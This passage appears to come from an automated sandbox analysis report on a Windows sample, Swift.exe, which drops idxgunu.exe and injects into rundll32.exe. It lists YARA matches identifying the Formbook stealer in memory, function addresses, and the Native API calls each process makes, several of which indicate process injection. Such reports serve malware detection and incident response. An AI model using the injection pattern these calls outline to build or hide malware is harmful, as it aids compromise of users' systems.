Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: idxgunu.exe PID: 1980, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: idxgunu.exe PID: 4620, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 3216, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Swift.exe

Code function: 0_2_004030F1 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004030F1

Source: C:\Users\user\Desktop\Swift.exe	Code function: 0_2_004047C0	0_2_004047C0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 1_2_01420227	1_2_01420227
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 1_2_014204C3	1_2_014204C3
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041F007	3_2_0041F007
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00401208	3_2_00401208
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041DC7B	3_2_0041DC7B
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041ED47	3_2_0041ED47
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00402D88	3_2_00402D88
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00409E5C	3_2_00409E5C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00409E60	3_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041EE6F	3_2_0041EE6F
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041D6F5	3_2_0041D6F5
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041DFEF	3_2_0041DFEF
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01314120	3_2_01314120
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012FF900	3_2_012FF900
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013CE824	3_2_013CE824
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013B1002	3_2_013B1002
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013220A0	3_2_013220A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C20A8	3_2_013C20A8
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130B090	3_2_0130B090
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C28EC	3_2_013C28EC
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C2B28	3_2_013C2B28
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0132EBB0	3_2_0132EBB0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BDBD2	3_2_013BDBD2
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C22AE	3_2_013C22AE
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_012F0D20	3_2_012F0D20
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C2D07	3_2_013C2D07
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C1D55	3_2_013C1D55
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01322581	3_2_01322581
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130D5E0	3_2_0130D5E0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C25DD	3_2_013C25DD
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0130841F	3_2_0130841F
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BD466	3_2_013BD466
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013C1FF1	3_2_013C1FF1
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01316E30	3_2_01316E30
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013BD616	3_2_013BD616
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05042D07	5_2_05042D07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05041D55	5_2_05041D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050425DD	5_2_050425DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8841F	5_2_04F8841F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8D5E0	5_2_04F8D5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503D466	5_2_0503D466
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA2581	5_2_04FA2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F70D20	5_2_04F70D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F96E30	5_2_04F96E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0504DFCE	5_2_0504DFCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05041FF1	5_2_05041FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503D616	5_2_0503D616
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05042EF7	5_2_05042EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FA20A0	5_2_04FA20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F8B090	5_2_04F8B090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05031002	5_2_05031002
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0504E824	5_2_0504E824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050420A8	5_2_050420A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F94120	5_2_04F94120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050428EC	5_2_050428EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04F7F900	5_2_04F7F900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_05042B28	5_2_05042B28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0503DBD2	5_2_0503DBD2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050303DA	5_2_050303DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FAEBB0	5_2_04FAEBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_050422AE	5_2_050422AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105F007	5_2_0105F007
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105ED47	5_2_0105ED47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01042D88	5_2_01042D88
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01042D90	5_2_01042D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01042FB0	5_2_01042FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01049E5C	5_2_01049E5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01049E60	5_2_01049E60

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04F7B150 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: String function: 012FB150 appears 35 times

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041A360 NtCreateFile,	3_2_0041A360
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041A410 NtReadFile,	3_2_0041A410
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041A490 NtClose,	3_2_0041A490
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041A540 NtAllocateVirtualMemory,	3_2_0041A540
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041A35A NtCreateFile,	3_2_0041A35A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041A40A NtReadFile,	3_2_0041A40A
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0041A48C NtClose,	3_2_0041A48C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_01339910
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013399A0 NtCreateSection,LdrInitializeThunk,	3_2_013399A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01339860
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339840 NtDelayExecution,LdrInitializeThunk,	3_2_01339840
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013398F0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_013398F0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339A20 NtResumeThread,LdrInitializeThunk,	3_2_01339A20
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339A00 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_01339A00
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339A50 NtCreateFile,LdrInitializeThunk,	3_2_01339A50
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339540 NtReadFile,LdrInitializeThunk,	3_2_01339540
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013395D0 NtClose,LdrInitializeThunk,	3_2_013395D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339710 NtQueryInformationToken,LdrInitializeThunk,	3_2_01339710
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013397A0 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_013397A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339780 NtMapViewOfSection,LdrInitializeThunk,	3_2_01339780
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_01339660
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013396E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_013396E0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339950 NtQueueApcThread,	3_2_01339950
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013399D0 NtCreateProcessEx,	3_2_013399D0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339820 NtEnumerateKey,	3_2_01339820
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0133B040 NtSuspendThread,	3_2_0133B040
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013398A0 NtWriteVirtualMemory,	3_2_013398A0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339B00 NtSetValueKey,	3_2_01339B00
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0133A3B0 NtGetContextThread,	3_2_0133A3B0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339A10 NtQuerySection,	3_2_01339A10
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339A80 NtOpenDirectoryObject,	3_2_01339A80
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0133AD30 NtSetContextThread,	3_2_0133AD30
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339520 NtWaitForSingleObject,	3_2_01339520
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339560 NtWriteFile,	3_2_01339560
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_013395F0 NtQueryInformationFile,	3_2_013395F0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339730 NtQueryVirtualMemory,	3_2_01339730
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0133A710 NtOpenProcessToken,	3_2_0133A710
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_0133A770 NtOpenThread,	3_2_0133A770
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339770 NtSetInformationFile,	3_2_01339770
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339760 NtOpenProcess,	3_2_01339760
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339FE0 NtCreateMutant,	3_2_01339FE0
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339610 NtEnumerateValueKey,	3_2_01339610
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 3_2_01339670 NtQueryInformationProcess,	3_2_01339670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB95D0 NtClose,LdrInitializeThunk,	5_2_04FB95D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9540 NtReadFile,LdrInitializeThunk,	5_2_04FB9540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB96E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04FB96E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB96D0 NtCreateKey,LdrInitializeThunk,	5_2_04FB96D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_04FB9660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9650 NtQueryValueKey,LdrInitializeThunk,	5_2_04FB9650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9FE0 NtCreateMutant,LdrInitializeThunk,	5_2_04FB9FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9780 NtMapViewOfSection,LdrInitializeThunk,	5_2_04FB9780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9710 NtQueryInformationToken,LdrInitializeThunk,	5_2_04FB9710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04FB9860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9840 NtDelayExecution,LdrInitializeThunk,	5_2_04FB9840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB99A0 NtCreateSection,LdrInitializeThunk,	5_2_04FB99A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_04FB9910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9A50 NtCreateFile,LdrInitializeThunk,	5_2_04FB9A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB95F0 NtQueryInformationFile,	5_2_04FB95F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9560 NtWriteFile,	5_2_04FB9560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FBAD30 NtSetContextThread,	5_2_04FBAD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9520 NtWaitForSingleObject,	5_2_04FB9520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9670 NtQueryInformationProcess,	5_2_04FB9670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9610 NtEnumerateValueKey,	5_2_04FB9610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB97A0 NtUnmapViewOfSection,	5_2_04FB97A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9770 NtSetInformationFile,	5_2_04FB9770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FBA770 NtOpenThread,	5_2_04FBA770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9760 NtOpenProcess,	5_2_04FB9760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9730 NtQueryVirtualMemory,	5_2_04FB9730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FBA710 NtOpenProcessToken,	5_2_04FBA710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB98F0 NtReadVirtualMemory,	5_2_04FB98F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB98A0 NtWriteVirtualMemory,	5_2_04FB98A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FBB040 NtSuspendThread,	5_2_04FBB040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9820 NtEnumerateKey,	5_2_04FB9820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB99D0 NtCreateProcessEx,	5_2_04FB99D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9950 NtQueueApcThread,	5_2_04FB9950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9A80 NtOpenDirectoryObject,	5_2_04FB9A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9A20 NtResumeThread,	5_2_04FB9A20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9A10 NtQuerySection,	5_2_04FB9A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9A00 NtProtectVirtualMemory,	5_2_04FB9A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FBA3B0 NtGetContextThread,	5_2_04FBA3B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04FB9B00 NtSetValueKey,	5_2_04FB9B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105A360 NtCreateFile,	5_2_0105A360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105A540 NtAllocateVirtualMemory,	5_2_0105A540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105A410 NtReadFile,	5_2_0105A410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105A490 NtClose,	5_2_0105A490
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105A35A NtCreateFile,	5_2_0105A35A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105A40A NtReadFile,	5_2_0105A40A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0105A48C NtClose,	5_2_0105A48C

Source: C:\Users\user\Desktop\Swift.exe

